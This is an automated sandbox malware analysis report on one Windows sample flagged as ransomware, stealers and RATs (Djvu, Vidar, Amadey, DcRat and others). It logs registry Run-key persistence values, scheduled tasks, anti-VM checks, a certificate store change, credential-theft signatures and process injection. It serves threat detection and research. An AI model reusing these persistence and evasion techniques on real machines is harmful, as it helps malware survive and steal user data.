Malware Analysis Report

2025-01-02 11:07

Sample ID 240315-bjc8zaeh28
Target 8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d
SHA256 8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d
Tags
amadey dcrat djvu smokeloader vidar 82df9629d6ef6fc7fe54d6eb2bc6137b pub1 backdoor discovery evasion infostealer persistence ransomware rat spyware stealer trojan lumma stealc zgrat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d

Threat Level: Known bad

The file 8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d was found to be: Known bad.

Malicious Activity Summary

amadey dcrat djvu smokeloader vidar 82df9629d6ef6fc7fe54d6eb2bc6137b pub1 backdoor discovery evasion infostealer persistence ransomware rat spyware stealer trojan lumma stealc zgrat

Amadey

Detected Djvu ransomware

ZGRat

Djvu Ransomware

DcRat

Vidar

Lumma Stealer

Detect ZGRat V1

Stealc

SmokeLoader

Detect Vidar Stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Blocklisted process makes network request

Modifies file permissions

Reads WinSCP keys stored on the system

Reads local data of messenger clients

Identifies Wine through registry keys

Deletes itself

Checks BIOS information in registry

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Delays execution with timeout.exe

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-15 01:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-15 01:10

Reported

2024-03-15 01:15

Platform

win7-20240221-en

Max time kernel

300s

Max time network

301s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f6994695-3cd8-4f33-87d3-a992b1783b4e\\6375.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D55B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F31A.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\463A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4D8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\463A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\463A.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f6994695-3cd8-4f33-87d3-a992b1783b4e\\6375.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\6375.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Windows\CurrentVersion\Run\blyat.dll = "rundll32 C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005011\\blyat.dll, Main" C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Dctooux.job C:\Users\Admin\AppData\Local\Temp\463A.exe N/A
File created C:\Windows\Tasks\explorgu.job C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3F18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\463A.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1216 wrote to memory of 2700 N/A N/A C:\Windows\system32\cmd.exe
PID 1216 wrote to memory of 2700 N/A N/A C:\Windows\system32\cmd.exe
PID 1216 wrote to memory of 2700 N/A N/A C:\Windows\system32\cmd.exe
PID 2700 wrote to memory of 2848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2700 wrote to memory of 2848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2700 wrote to memory of 2848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1216 wrote to memory of 328 N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 1216 wrote to memory of 328 N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 1216 wrote to memory of 328 N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 1216 wrote to memory of 328 N/A N/A C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 328 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2600 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Windows\SysWOW64\icacls.exe
PID 2600 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Windows\SysWOW64\icacls.exe
PID 2600 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Windows\SysWOW64\icacls.exe
PID 2600 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Windows\SysWOW64\icacls.exe
PID 2600 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2600 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2600 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2600 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 2392 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\Temp\6375.exe
PID 1820 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 1820 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 1820 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 1820 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
PID 660 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
